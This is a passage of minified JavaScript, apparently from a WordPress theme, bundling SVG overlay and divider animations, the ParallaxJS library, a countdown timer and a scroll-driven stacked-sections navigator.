${o} ${e[n+1]} ${t} ${e[n+1]} `}i+=this.isOpened?"V 0 H 0":"V 100 H 0"}if("pix-overlay-4"==this.type){for(n=0;n<this.numPoints;n++){const i=n%2==1?ease.sineOut:ease.exponentialInOut;e[n]=100*(1-i(Math.min(Math.max(t-this.delayPointsArray[n],0)/this.duration,1)))}i+=this.isOpened?`M 0 0 H ${e[0]}`:`M ${e[0]} 0`;for(n=0;n<this.numPoints-1;n++){const t=(n+1)/(this.numPoints-1)*100,o=t-1/(this.numPoints-1)*100/2;i+=`C ${e[n]} ${o} ${e[n+1]} ${o} ${e[n+1]} ${t} `}i+=this.isOpened?"H 100 V 0":"H 0 V 0"}if("pix-overlay-5"==this.type){for(n=0;n<this.numPoints;n++)e[n]=100*(1-ease.cubicInOut(Math.min(Math.max(t-this.delayPointsArray[n],0)/this.duration,1)));i+=this.isOpened?`M 0 0 H ${e[0]}`:`M ${e[0]} 0`;for(n=0;n<this.numPoints-1;n++){const t=(n+1)/(this.numPoints-1)*100,o=t-1/(this.numPoints-1)*100/2;i+=`C ${e[n]} ${o} ${e[n+1]} ${o} ${e[n+1]} ${t} `}i+=this.isOpened?"H 100 V 0":"H 0 V 0"}if("pix-overlay-6"==this.type){for(n=0;n<this.numPoints;n++)e[n]=100*(1-ease.cubicInOut(Math.min(Math.max(t-this.delayPointsArray[n],0)/this.duration,1)));i+=this.isOpened?`M 0 0 V ${e[0]}`:`M 0 ${e[0]} `;for(n=0;n<this.numPoints-1;n++){const t=(n+1)/(this.numPoints-1)*100,o=t-1/(this.numPoints-1)*100/2;i+=`C ${o} ${e[n]} ${o} ${e[n+1]} ${t} ${e[n+1]} `}i+=this.isOpened?"V 100 H 0":"V 0 H 0"}return i}render(){if(this.isOpened)for(var t=0;t<this.path.length;t++)this.path[t].setAttribute("d",this.updatePath(Date.now()-(this.timeStart+this.delayPerPath*t)));else for(t=0;t<this.path.length;t++)this.path[t].setAttribute("d",this.updatePath(Date.now()-(this.timeStart+this.delayPerPath*(this.path.length-t-1))))}renderLoop(){this.render(),Date.now()-this.timeStart<this.duration+this.delayPerPath*(this.path.length-1)+this.delayPointsMax?requestAnimationFrame(()=>{this.renderLoop()}):this.isAnimating=!1}}class dividerShapes{constructor(t){this.elm=t,this.path=t.querySelectorAll("path"),this.numPoints=3,this.speed=.4,this.paths=[],this.pointsDir=[],this.pathsDir=[],this.min=20,this.max=80}initPoints(){for(var t=0;t<this.path.length;t++){let i=[],n=[];this.getRndInteger(this.min+1,this.max-1);const o=Math.random()*Math.PI*2;for(var e=0;e<this.numPoints;e++){n[e]=this.getRndInteger(0,1);const t=e/(this.numPoints-1)*Math.PI*2;i[e]=(Math.sin(t+o)+1)/2*100}this.paths[t]=i,this.pathsDir[t]=n}for(e=0;e<this.path.length;e++){let i="";i+=`M 0 ${this.paths[e][0]} `;for(t=0;t<this.numPoints-1;t++){const n=(t+1)/(this.numPoints-1)*100,o=n-1/(this.numPoints-1)*100/2;i+=`C ${o} ${this.paths[e][t]} ${o} ${this.paths[e][t+1]} ${n} ${this.paths[e][t+1]} `}i+="V 100 H 0",this.path[e].setAttribute("d",i)}this.loop()}loop(){var t=this;setTimeout(function(){if(window.isInViewport(t.elm))for(var e=0;e<t.path.length;e++){for(var i=0;i<t.numPoints;i++){var n=t.getRndInteger(0,40)/100;t.pathsDir[e][i]>0?(t.paths[e][i]+=Math.abs(Math.sin((t.paths[e][i]-t.min)/(t.max-t.min)*Math.PI))*t.speed+n,t.paths[e][i]>=(0==e?t.max-10:t.max)&&(t.pathsDir[e][i]=0)):(t.paths[e][i]-=Math.abs(Math.sin((t.max-t.paths[e][i]-t.min)/(t.max-t.min)*Math.PI))*t.speed+n,t.paths[e][i]<=t.min&&(t.pathsDir[e][i]=1))}let o="";o+=`M 0 ${t.paths[e][0]} `;for(i=0;i<t.numPoints-1;i++){const n=(i+1)/(t.numPoints-1)*100,a=n-1/(t.numPoints-1)*100/2;o+=" ",o+="C "+a+" "+t.paths[e][i]+" "+a+" "+t.paths[e][i+1]+" "+n+" "+t.paths[e][i+1]+" "}o+="V 100 H 0",t.path[e].setAttribute("d",o)}t.loop()},40)}getRndInteger(t,e){return Math.floor(Math.random()*(e-t))+t}}!function(t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define([],t):("undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:this).Parallax=t()}(function(){return function t(e,i,n){function o(s,r){if(!i[s]){if(!e[s]){var l="function"==typeof require&&require;if(!r&&l)return l(s,!0);if(a)return a(s,!0);var d=new Error("Cannot find module '"+s+"'");throw d.code="MODULE_NOT_FOUND",d}var c=i[s]={exports:{}};e[s][0].call(c.exports,function(t){return o(e[s][1][t]||t)},c,c.exports,t,e,i,n)}return i[s].exports}for(var a="function"==typeof require&&require,s=0;s<n.length;s++)o(n[s]);return o}({1:[function(t,e,i){"use strict";var n=Object.getOwnPropertySymbols,o=Object.prototype.hasOwnProperty,a=Object.prototype.propertyIsEnumerable;e.exports=function(){try{if(!Object.assign)return!1;var t=new String("abc");if(t[5]="de","5"===Object.getOwnPropertyNames(t)[0])return!1;for(var e={},i=0;i<10;i++)e["_"+String.fromCharCode(i)]=i;if("0123456789"!==Object.getOwnPropertyNames(e).map(function(t){return e[t]}).join(""))return!1;var n={};return"abcdefghijklmnopqrst".split("").forEach(function(t){n[t]=t}),"abcdefghijklmnopqrst"===Object.keys(Object.assign({},n)).join("")}catch(t){return!1}}()?Object.assign:function(t,e){for(var i,s,r=function(t){if(null===t||void 0===t)throw new TypeError("Object.assign cannot be called with null or undefined");return Object(t)}(t),l=1;l<arguments.length;l++){for(var d in i=Object(arguments[l]))o.call(i,d)&&(r[d]=i[d]);if(n){s=n(i);for(var c=0;c<s.length;c++)a.call(i,s[c])&&(r[s[c]]=i[s[c]])}}return r}},{}],2:[function(t,e,i){(function(t){(function(){var i,n,o,a,s,r;"undefined"!=typeof performance&&null!==performance&&performance.now?e.exports=function(){return performance.now()}:void 0!==t&&null!==t&&t.hrtime?(e.exports=function(){return(i()-s)/1e6},n=t.hrtime,a=(i=function(){var t;return 1e9*(t=n())[0]+t[1]})(),r=1e9*t.uptime(),s=a-r):Date.now?(e.exports=function(){return Date.now()-o},o=Date.now()):(e.exports=function(){return(new Date).getTime()-o},o=(new Date).getTime())}).call(this)}).call(this,t("_process"))},{_process:3}],3:[function(t,e,i){function n(){throw new Error("setTimeout has not been defined")}function o(){throw new Error("clearTimeout has not been defined")}function a(t){if(c===setTimeout)return setTimeout(t,0);if((c===n||!c)&&setTimeout)return c=setTimeout,setTimeout(t,0);try{return c(t,0)}catch(e){try{return c.call(null,t,0)}catch(e){return c.call(this,t,0)}}}function s(){m&&h&&(m=!1,h.length?f=h.concat(f):y=-1,f.length&&r())}function r(){if(!m){var t=a(s);m=!0;for(var e=f.length;e;){for(h=f,f=[];++y<e;)h&&h[y].run();y=-1,e=f.length}h=null,m=!1,function(t){if(p===clearTimeout)return clearTimeout(t);if((p===o||!p)&&clearTimeout)return p=clearTimeout,clearTimeout(t);try{p(t)}catch(e){try{return p.call(null,t)}catch(e){return p.call(this,t)}}}(t)}}function l(t,e){this.fun=t,this.array=e}function d(){}var c,p,u=e.exports={};!function(){try{c="function"==typeof setTimeout?setTimeout:n}catch(t){c=n}try{p="function"==typeof clearTimeout?clearTimeout:o}catch(t){p=o}}();var h,f=[],m=!1,y=-1;u.nextTick=function(t){var e=new Array(arguments.length-1);if(arguments.length>1)for(var i=1;i<arguments.length;i++)e[i-1]=arguments[i];f.push(new l(t,e)),1!==f.length||m||a(r)},l.prototype.run=function(){this.fun.apply(null,this.array)},u.title="browser",u.browser=!0,u.env={},u.argv=[],u.version="",u.versions={},u.on=d,u.addListener=d,u.once=d,u.off=d,u.removeListener=d,u.removeAllListeners=d,u.emit=d,u.prependListener=d,u.prependOnceListener=d,u.listeners=function(t){return[]},u.binding=function(t){throw new Error("process.binding is not supported")},u.cwd=function(){return"/"},u.chdir=function(t){throw new Error("process.chdir is not supported")},u.umask=function(){return 0}},{}],4:[function(t,e,i){(function(i){for(var n=t("performance-now"),o="undefined"==typeof window?i:window,a=["moz","webkit"],s="AnimationFrame",r=o["request"+s],l=o["cancel"+s]||o["cancelRequest"+s],d=0;!r&&d<a.length;d++)r=o[a[d]+"Request"+s],l=o[a[d]+"Cancel"+s]||o[a[d]+"CancelRequest"+s];if(!r||!l){var c=0,p=0,u=[];r=function(t){if(0===u.length){var e=n(),i=Math.max(0,1e3/60-(e-c));c=i+e,setTimeout(function(){var t=u.slice(0);u.length=0;for(var e=0;e<t.length;e++)if(!t[e].cancelled)try{t[e].callback(c)}catch(t){setTimeout(function(){throw t},0)}},Math.round(i))}return u.push({handle:++p,callback:t,cancelled:!1}),p},l=function(t){for(var e=0;e<u.length;e++)u[e].handle===t&&(u[e].cancelled=!0)}}e.exports=function(t){return r.call(o,t)},e.exports.cancel=function(){l.apply(o,arguments)},e.exports.polyfill=function(){o.requestAnimationFrame=r,o.cancelAnimationFrame=l}}).call(this,"undefined"!=typeof global?global:"undefined"!=typeof self?self:"undefined"!=typeof window?window:{})},{"performance-now":2}],5:[function(t,e,i){"use strict";var n=function(){function t(t,e){for(var i=0;i<e.length;i++){var n=e[i];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(t,n.key,n)}}return function(e,i,n){return i&&t(e.prototype,i),n&&t(e,n),e}}(),o=t("raf"),a=t("object-assign"),s={propertyCache:{},vendors:[null,["-webkit-","webkit"],["-moz-","Moz"],["-o-","O"],["-ms-","ms"]],clamp:function(t,e,i){return e<i?t<e?e:t>i?i:t:t<i?i:t>e?e:t},data:function(t,e){return s.deserialize(t.getAttribute("data-"+e))},deserialize:function(t){return"true"===t||"false"!==t&&("null"===t?null:!isNaN(parseFloat(t))&&isFinite(t)?parseFloat(t):t)},camelCase:function(t){return t.replace(/-+(.)?/g,function(t,e){return e?e.toUpperCase():""})},accelerate:function(t){s.css(t,"transform","translate3d(0,0,0) rotate(0.0001deg)"),s.css(t,"transform-style","preserve-3d"),s.css(t,"backface-visibility","hidden")},transformSupport:function(t){for(var e=document.createElement("div"),i=!1,n=null,o=!1,a=null,r=null,l=0,d=s.vendors.length;l<d;l++)if(null!==s.vendors[l]?(a=s.vendors[l][0]+"transform",r=s.vendors[l][1]+"Transform"):(a="transform",r="transform"),void 0!==e.style[r]){i=!0;break}switch(t){case"2D":o=i;break;case"3D":if(i){var c=document.body||document.createElement("body"),p=document.documentElement,u=p.style.overflow,h=!1;document.body||(h=!0,p.style.overflow="hidden",p.appendChild(c),c.style.overflow="hidden",c.style.background=""),c.appendChild(e),e.style[r]="translate3d(1px,1px,1px)",o=void 0!==(n=window.getComputedStyle(e).getPropertyValue(a))&&n.length>0&&"none"!==n,p.style.overflow=u,c.removeChild(e),h&&(c.removeAttribute("style"),c.parentNode.removeChild(c))}}return o},css:function(t,e,i){var n=s.propertyCache[e];if(!n)for(var o=0,a=s.vendors.length;o<a;o++)if(n=null!==s.vendors[o]?s.camelCase(s.vendors[o][1]+"-"+e):e,void 0!==t.style[n]){s.propertyCache[e]=n;break}t.style[n]=i}},r={relativeInput:!1,clipRelativeInput:!1,inputElement:null,hoverOnly:!1,calibrationThreshold:100,calibrationDelay:500,supportDelay:500,calibrateX:!1,calibrateY:!0,invertX:!0,invertY:!0,limitX:!1,limitY:!1,scalarX:10,scalarY:10,frictionX:.1,frictionY:.1,originX:.5,originY:.5,pointerEvents:!1,precision:1,onReady:null,selector:null},l=function(){function t(e,i){(function(t,e){if(!(t instanceof e))throw new TypeError("Cannot call a class as a function")})(this,t),this.element=e;var n={calibrateX:s.data(this.element,"calibrate-x"),calibrateY:s.data(this.element,"calibrate-y"),invertX:s.data(this.element,"invert-x"),invertY:s.data(this.element,"invert-y"),limitX:s.data(this.element,"limit-x"),limitY:s.data(this.element,"limit-y"),scalarX:s.data(this.element,"scalar-x"),scalarY:s.data(this.element,"scalar-y"),frictionX:s.data(this.element,"friction-x"),frictionY:s.data(this.element,"friction-y"),originX:s.data(this.element,"origin-x"),originY:s.data(this.element,"origin-y"),pointerEvents:s.data(this.element,"pointer-events"),precision:s.data(this.element,"precision"),relativeInput:s.data(this.element,"relative-input"),clipRelativeInput:s.data(this.element,"clip-relative-input"),hoverOnly:s.data(this.element,"hover-only"),inputElement:document.querySelector(s.data(this.element,"input-element")),selector:s.data(this.element,"selector")};for(var o in n)null===n[o]&&delete n[o];a(this,r,n,i),this.inputElement||(this.inputElement=this.element),this.calibrationTimer=null,this.calibrationFlag=!0,this.enabled=!1,this.depthsX=[],this.depthsY=[],this.raf=null,this.bounds=null,this.elementPositionX=0,this.elementPositionY=0,this.elementWidth=0,this.elementHeight=0,this.elementCenterX=0,this.elementCenterY=0,this.elementRangeX=0,this.elementRangeY=0,this.calibrationX=0,this.calibrationY=0,this.inputX=0,this.inputY=0,this.motionX=0,this.motionY=0,this.velocityX=0,this.velocityY=0,this.onMouseMove=this.onMouseMove.bind(this),this.onDeviceOrientation=this.onDeviceOrientation.bind(this),this.onDeviceMotion=this.onDeviceMotion.bind(this),this.onOrientationTimer=this.onOrientationTimer.bind(this),this.onMotionTimer=this.onMotionTimer.bind(this),this.onCalibrationTimer=this.onCalibrationTimer.bind(this),this.onAnimationFrame=this.onAnimationFrame.bind(this),this.onWindowResize=this.onWindowResize.bind(this),this.windowWidth=null,this.windowHeight=null,this.windowCenterX=null,this.windowCenterY=null,this.windowRadiusX=null,this.windowRadiusY=null,this.portrait=!1,this.desktop=!navigator.userAgent.match(/(iPhone|iPod|iPad|Android|BlackBerry|BB10|mobi|tablet|opera mini|nexus 7)/i),this.motionSupport=!!window.DeviceMotionEvent&&!this.desktop,this.orientationSupport=!!window.DeviceOrientationEvent&&!this.desktop,this.orientationStatus=0,this.motionStatus=0,this.initialise()}return n(t,[{key:"initialise",value:function(){void 0===this.transform2DSupport&&(this.transform2DSupport=s.transformSupport("2D"),this.transform3DSupport=s.transformSupport("3D")),this.transform3DSupport&&s.accelerate(this.element),"static"===window.getComputedStyle(this.element).getPropertyValue("position")&&(this.element.style.position="relative"),this.pointerEvents||(this.element.style.pointerEvents="none"),this.updateLayers(),this.updateDimensions(),this.enable(),this.queueCalibration(this.calibrationDelay)}},{key:"doReadyCallback",value:function(){this.onReady&&this.onReady()}},{key:"updateLayers",value:function(){this.selector?this.layers=this.element.querySelectorAll(this.selector):this.layers=this.element.children,this.layers.length||console.warn("ParallaxJS: Your scene does not have any layers."),this.depthsX=[],this.depthsY=[];for(var t=0;t<this.layers.length;t++){var e=this.layers[t];this.transform3DSupport&&s.accelerate(e),e.style.position=t?"absolute":"relative",e.style.display="block",e.style.left=0,e.style.top=0;var i=s.data(e,"depth")||0;this.depthsX.push(s.data(e,"depth-x")||i),this.depthsY.push(s.data(e,"depth-y")||i)}}},{key:"updateDimensions",value:function(){this.windowWidth=window.innerWidth,this.windowHeight=window.innerHeight,this.windowCenterX=this.windowWidth*this.originX,this.windowCenterY=this.windowHeight*this.originY,this.windowRadiusX=Math.max(this.windowCenterX,this.windowWidth-this.windowCenterX),this.windowRadiusY=Math.max(this.windowCenterY,this.windowHeight-this.windowCenterY)}},{key:"updateBounds",value:function(){this.bounds=this.inputElement.getBoundingClientRect(),this.elementPositionX=this.bounds.left,this.elementPositionY=this.bounds.top,this.elementWidth=this.bounds.width,this.elementHeight=this.bounds.height,this.elementCenterX=this.elementWidth*this.originX,this.elementCenterY=this.elementHeight*this.originY,this.elementRangeX=Math.max(this.elementCenterX,this.elementWidth-this.elementCenterX),this.elementRangeY=Math.max(this.elementCenterY,this.elementHeight-this.elementCenterY)}},{key:"queueCalibration",value:function(t){clearTimeout(this.calibrationTimer),this.calibrationTimer=setTimeout(this.onCalibrationTimer,t)}},{key:"enable",value:function(){this.enabled||(this.enabled=!0,this.orientationSupport?(this.portrait=!1,window.addEventListener("deviceorientation",this.onDeviceOrientation),this.detectionTimer=setTimeout(this.onOrientationTimer,this.supportDelay)):this.motionSupport?(this.portrait=!1,window.addEventListener("devicemotion",this.onDeviceMotion),this.detectionTimer=setTimeout(this.onMotionTimer,this.supportDelay)):(this.calibrationX=0,this.calibrationY=0,this.portrait=!1,window.addEventListener("mousemove",this.onMouseMove),this.doReadyCallback()),window.addEventListener("resize",this.onWindowResize),this.raf=o(this.onAnimationFrame))}},{key:"disable",value:function(){this.enabled&&(this.enabled=!1,this.orientationSupport?window.removeEventListener("deviceorientation",this.onDeviceOrientation):this.motionSupport?window.removeEventListener("devicemotion",this.onDeviceMotion):window.removeEventListener("mousemove",this.onMouseMove),window.removeEventListener("resize",this.onWindowResize),o.cancel(this.raf))}},{key:"calibrate",value:function(t,e){this.calibrateX=void 0===t?this.calibrateX:t,this.calibrateY=void 0===e?this.calibrateY:e}},{key:"invert",value:function(t,e){this.invertX=void 0===t?this.invertX:t,this.invertY=void 0===e?this.invertY:e}},{key:"friction",value:function(t,e){this.frictionX=void 0===t?this.frictionX:t,this.frictionY=void 0===e?this.frictionY:e}},{key:"scalar",value:function(t,e){this.scalarX=void 0===t?this.scalarX:t,this.scalarY=void 0===e?this.scalarY:e}},{key:"limit",value:function(t,e){this.limitX=void 0===t?this.limitX:t,this.limitY=void 0===e?this.limitY:e}},{key:"origin",value:function(t,e){this.originX=void 0===t?this.originX:t,this.originY=void 0===e?this.originY:e}},{key:"setInputElement",value:function(t){this.inputElement=t,this.updateDimensions()}},{key:"setPosition",value:function(t,e,i){e=e.toFixed(this.precision)+"px",i=i.toFixed(this.precision)+"px",this.transform3DSupport?s.css(t,"transform","translate3d("+e+","+i+",0)"):this.transform2DSupport?s.css(t,"transform","translate("+e+","+i+")"):(t.style.left=e,t.style.top=i)}},{key:"onOrientationTimer",value:function(){this.orientationSupport&&0===this.orientationStatus?(this.disable(),this.orientationSupport=!1,this.enable()):this.doReadyCallback()}},{key:"onMotionTimer",value:function(){this.motionSupport&&0===this.motionStatus?(this.disable(),this.motionSupport=!1,this.enable()):this.doReadyCallback()}},{key:"onCalibrationTimer",value:function(){this.calibrationFlag=!0}},{key:"onWindowResize",value:function(){this.updateDimensions()}},{key:"onAnimationFrame",value:function(){this.updateBounds();var t=this.inputX-this.calibrationX,e=this.inputY-this.calibrationY;(Math.abs(t)>this.calibrationThreshold||Math.abs(e)>this.calibrationThreshold)&&this.queueCalibration(0),this.portrait?(this.motionX=this.calibrateX?e:this.inputY,this.motionY=this.calibrateY?t:this.inputX):(this.motionX=this.calibrateX?t:this.inputX,this.motionY=this.calibrateY?e:this.inputY),this.motionX*=this.elementWidth*(this.scalarX/100),this.motionY*=this.elementHeight*(this.scalarY/100),isNaN(parseFloat(this.limitX))||(this.motionX=s.clamp(this.motionX,-this.limitX,this.limitX)),isNaN(parseFloat(this.limitY))||(this.motionY=s.clamp(this.motionY,-this.limitY,this.limitY)),this.velocityX+=(this.motionX-this.velocityX)*this.frictionX,this.velocityY+=(this.motionY-this.velocityY)*this.frictionY;for(var i=0;i<this.layers.length;i++){var n=this.layers[i],a=this.depthsX[i],r=this.depthsY[i],l=this.velocityX*(a*(this.invertX?-1:1)),d=this.velocityY*(r*(this.invertY?-1:1));this.setPosition(n,l,d)}this.raf=o(this.onAnimationFrame)}},{key:"rotate",value:function(t,e){var i=(t||0)/30,n=(e||0)/30,o=this.windowHeight>this.windowWidth;this.portrait!==o&&(this.portrait=o,this.calibrationFlag=!0),this.calibrationFlag&&(this.calibrationFlag=!1,this.calibrationX=i,this.calibrationY=n),this.inputX=i,this.inputY=n}},{key:"onDeviceOrientation",value:function(t){var e=t.beta,i=t.gamma;null!==e&&null!==i&&(this.orientationStatus=1,this.rotate(e,i))}},{key:"onDeviceMotion",value:function(t){var e=t.rotationRate.beta,i=t.rotationRate.gamma;null!==e&&null!==i&&(this.motionStatus=1,this.rotate(e,i))}},{key:"onMouseMove",value:function(t){var e=t.clientX,i=t.clientY;if(this.hoverOnly&&(e<this.elementPositionX||e>this.elementPositionX+this.elementWidth||i<this.elementPositionY||i>this.elementPositionY+this.elementHeight))return this.inputX=0,void(this.inputY=0);this.relativeInput?(this.clipRelativeInput&&(e=Math.max(e,this.elementPositionX),e=Math.min(e,this.elementPositionX+this.elementWidth),i=Math.max(i,this.elementPositionY),i=Math.min(i,this.elementPositionY+this.elementHeight)),this.elementRangeX&&this.elementRangeY&&(this.inputX=(e-this.elementPositionX-this.elementCenterX)/this.elementRangeX,this.inputY=(i-this.elementPositionY-this.elementCenterY)/this.elementRangeY)):this.windowRadiusX&&this.windowRadiusY&&(this.inputX=(e-this.windowCenterX)/this.windowRadiusX,this.inputY=(i-this.windowCenterY)/this.windowRadiusY)}},{key:"destroy",value:function(){this.disable(),clearTimeout(this.calibrationTimer),clearTimeout(this.detectionTimer),this.element.removeAttribute("style");for(var t=0;t<this.layers.length;t++)this.layers[t].removeAttribute("style");delete this.element,delete this.layers}},{key:"version",value:function(){return"3.1.0"}}]),t}();e.exports=l},{"object-assign":1,raf:4}]},{},[5])(5)}),function(t){if("object"==typeof exports&&"undefined"!=typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var e;"undefined"!=typeof window?e=window:"undefined"!=typeof global?e=global:"undefined"!=typeof self&&(e=self),e.Countdown=t()}}(function(){return function t(e,i,n){function o(s,r){if(!i[s]){if(!e[s]){var l="function"==typeof require&&require;if(!r&&l)return l(s,!0);if(a)return a(s,!0);var d=new Error("Cannot find module '"+s+"'");throw d.code="MODULE_NOT_FOUND",d}var c=i[s]={exports:{}};e[s][0].call(c.exports,function(t){var i=e[s][1][t];return o(i||t)},c,c.exports,t,e,i,n)}return i[s].exports}for(var a="function"==typeof require&&require,s=0;s<n.length;s++)o(n[s]);return o}({1:[function(t,e,i){var n={date:"June 7, 2087 15:03:25",refresh:1e3,offset:0,onEnd:function(){},render:function(t){this.el.innerHTML=t.years+" years, "+t.days+" days, "+this.leadingZeros(t.hours)+" hours, "+this.leadingZeros(t.min)+" min and "+this.leadingZeros(t.sec)+" sec"}};e.exports=function(t,e){this.el=t,this.options={},this.interval=!1,this.mergeOptions=function(t){for(var e in n)n.hasOwnProperty(e)&&(this.options[e]=void 0!==t[e]?t[e]:n[e],"date"===e&&"object"!=typeof this.options.date&&(this.options.date=new Date(this.options.date)),"function"==typeof this.options[e]&&(this.options[e]=this.options[e].bind(this)));"object"!=typeof this.options.date&&(this.options.date=new Date(this.options.date))}.bind(this),this.mergeOptions(e),this.getDiffDate=function(){var t=(this.options.date.getTime()-Date.now()+this.options.offset)/1e3,e={years:0,days:0,hours:0,min:0,sec:0,millisec:0};return t<=0?(this.interval&&(this.stop(),this.options.onEnd()),e):(t>=31557600&&(e.years=Math.floor(t/31557600),t-=365.25*e.years*86400),t>=86400&&(e.days=Math.floor(t/86400),t-=86400*e.days),t>=3600&&(e.hours=Math.floor(t/3600),t-=3600*e.hours),t>=60&&(e.min=Math.floor(t/60),t-=60*e.min),e.sec=Math.round(t),e.millisec=t%1*1e3,e)}.bind(this),this.leadingZeros=function(t,e){return e=e||2,(t=String(t)).length>e?t:(Array(e+1).join("0")+t).substr(-e)},this.update=function(t){return"object"!=typeof t&&(t=new Date(t)),this.options.date=t,this.render(),this}.bind(this),this.stop=function(){return this.interval&&(clearInterval(this.interval),this.interval=!1),this}.bind(this),this.render=function(){return this.options.render(this.getDiffDate()),this}.bind(this),this.start=function(){if(!this.interval)return this.render(),this.options.refresh&&(this.interval=setInterval(this.render,this.options.refresh)),this}.bind(this),this.updateOffset=function(t){return this.options.offset=t,this}.bind(this),this.restart=function(t){return this.mergeOptions(t),this.interval=!1,this.start(),this}.bind(this),this.start()}},{}],2:[function(t,e,i){var n=t("./countdown.js");jQuery.fn.countdown=function(t){return $.each(this,function(e,i){var o=$(i);o.data("countdown")||(o.data("date")&&(t.date=o.data("date")),o.data("countdown",new n(i,t)))})},e.exports=n},{"./countdown.js":1}]},{},[2])(2)}),function(t){t.fn.stack=function(){if(t("body").hasClass("vc_editor")||window.vc_iframe)return!1;if("undefined"!=typeof elementorFrontend&&null!==elementorFrontend&&elementorFrontend.config.environmentMode.edit)return t("body").removeClass("pix-sections-stack"),!1;this.css("position","fixed"),0==t(".sticky-overlay").length&&t("#content").append('<div class="sticky-overlay"></div>'),0==t("#pix-vertical-nav").length&&t("body").append('<nav id="pix-vertical-nav"><ul></ul></nav>');var e=this.length,i=[],n=t(window).height(),o=0,a=[],s=!0,r=0,l=0,d=0,c=!1;t("#wpadminbar").length>0&&(l=t("#wpadminbar").outerHeight()),this.each(function(n){o+=t(this).outerHeight(),t(this).css("z-index",10*e);var l="Section "+n;t(this).attr("data-section-name")&&""!=t(this).attr("data-section-name")&&(l=t(this).attr("data-section-name")),i.push(t(this));var c="",p=!1;let u="";u=t(this).prop("id")?t(this).prop("id"):"pix-stack-section-"+n,t(this).hasClass("site-footer2")?(p=!0,d=t(this).outerHeight(),t(this).css({bottom:"0"})):(t(this).css("top","0px"),c='<li><a class="pix-stack-links" id="pix-stack-link-'+n+'" data-top="'+r+'" href="#'+u+'" data-number="'+n+'"><span class="pix-dot"></span><span class="pix-label">'+l+"</span></a></li>"),a.push({el:t(this),height:t(this).outerHeight(),index:10*e,num:e,active:s,start:r,limit:o,bottom:p,link:"pix-stack-link-"+n}),e--,t(this).attr("data-scroll",r),t(this).attr("data-number",n),t(this).addClass("pix-slides-section"),r=o,s=!1,t(this).attr("id",u),t("#pix-vertical-nav ul").append(c)}),t("#page").css("height",o-l),void 0!=a[a.length-1]&&a[a.length-1].bottom&&(c=a[a.length-1]);var p=a[0];t("#"+p.link).addClass("is-selected"),p.el.addClass("is-sticky-active");let u=0,h=0;var f;function m(){var e=0,i=0;t.each(a,function(t){e+=a[t].el.outerHeight(),a[t].height=a[t].el.outerHeight(),a[t].start=i,a[t].limit=e,i=e}),t("#page").css("height",e-l)}document.addEventListener("scroll",e=>{let i=t(window).scrollTop();i>=p.start&&i<=p.limit||(p=function(e,i){var n=i;return t.each(a,function(o){a[o].start<=e&&a[o].limit>=e&&(i.active=!1,i.el.removeClass("is-sticky-active"),t(".pix-stack-links").removeClass("is-selected"),a[o].active=!0,a[o].el.addClass("is-sticky-active"),t("#"+a[o].link).addClass("is-selected"),n=a[o])}),n}(i,p),setTimeout((i=i,void t.each(a,function(t){a[t].active||a[t].bottom||(a[t].limit<=i?a[t].el.css("top",-a[t].height):a[t].el.css("top","0"))})),0),window.pix_animation_display(p.el),piximations.init()),t(".site-content").css("z-index",p.index),h!=p.index-4&&t(".sticky-overlay").css("z-index",p.index-4),h=p.index-4;var s=(p.height+p.el.position().top)/n;2==p.num&&(s=(t(window).scrollTop()+p.height+p.el.position().top-o-l)/d,c&&(window.pix_animation(c.el,!0),piximations.play(c.el))),s<0&&(s=0),s>.8&&(s=.8),s*=.8,p.el.bottom||p.el.css("top",-t(window).scrollTop()+p.start),u!=s&&t(".sticky-overlay").css("opacity",s),u=s},{passive:!0}),setTimeout(function(){m()},1e3),setTimeout(function(){m()},2e3),window.addEventListener("resize",m);var y=t(".pix-section"),g=t("#pix-vertical-nav a");if(v(),t(window).on("scroll",function(){v()}),t("#pix-vertical-nav a").on("click",function(e){e.preventDefault();let i=t(this.hash).data("scroll");return t(this).data("number")&&(i=a[t(this).data("number")].start+10),b(i),e.stopPropagation(),!1}),t(".pix-scroll-down").on("click",function(e){e.preventDefault(),b(t(this.hash))}),t("a:not(.pix-stack-links)").on("click",function(e){var i=t(this).attr("href");let n=!1;if(i)if(i.startsWith("#")){if(t(i).length){let e=t(i);n=t(e).attr("data-scroll"),t(e).data("number")&&(n=a[t(e).data("number")].start+10)}}else if(-1!=i.indexOf("#")){let e=i.substr(i.indexOf("#"));t(e).length&&(n=t(e).attr("data-scroll")+50)}n&&(e.stopPropagation(),e.preventDefault(),b(n))}),-1!=window.location.href.indexOf("#")){let e=window.location.href.substr(window.location.href.indexOf("#"));t(e).length&&setTimeout(function(){scroll=t(e).attr("data-scroll")+150,b(scroll)},1e3)}function v(){y.each(function(){$this=t(this);var e=t('#pix-vertical-nav a[href="#'+$this.attr("id")+'"]').data("number")-1;$this.offset().top-t(window).height()/2<t(window).scrollTop()&&$this.offset().top+$this.height()-t(window).height()/2>t(window).scrollTop()?g.eq(e).addClass("is-selected"):g.eq(e).removeClass("is-selected")})}function b(e){t("body,html").animate({scrollTop:e+1},600)}}}(jQuery),function(t){window.pix_section_stack=function(){t("body").hasClass("vc_editor")||t(".pix-scale-in, .pix-scale-in-xs, .pix-scale-in-sm, .pix-scale-in-lg").each(function(){var e=t(this);if(e.hasClass("pix-loaded"))return!1;e.addClass("pix-loaded");e.offset().top;var i=e.outerHeight(),n=(e.offset().top,2),o=i/3;e.hasClass("pix-scale-in-xs")&&(n=1.1,o>300&&(o=300)),e.hasClass("pix-scale-in-sm")&&(n=1.2),e.hasClass("pix-scale-in")&&(n=1.6),e.css({"z-index":"99999999","transform-style":"preserve-3d"});var a=this.getBoundingClientRect(),s=this,r=t(window).height(),l=t(window).height()/2,d=r-l;if(a.top<=r&&a.top>=l){var c=(a.top-l)/d,p=(n-1)*c;p++;var u=o*c;e.css({transform:"scale("+p+") translateY("+u+"px)"})}else a.top>r?e.css({transform:"scale("+n+") translateY("+o+"px)"}):e.css({transform:"scale(1) translateY(0px)"});document.addEventListener("scroll",t=>{if((a=s.getBoundingClientRect()).top<=r&&a.top>=l){var i=(a.top-l)/d,c=(n-1)*i;c++;var p=o*i;e.css({transform:"scale("+c+") translateY("+p+"px)"})}else a.top>r?e.css({transform:"scale("+n+") translateY("+o+"px)"}):e.css({transform:"scale(1) 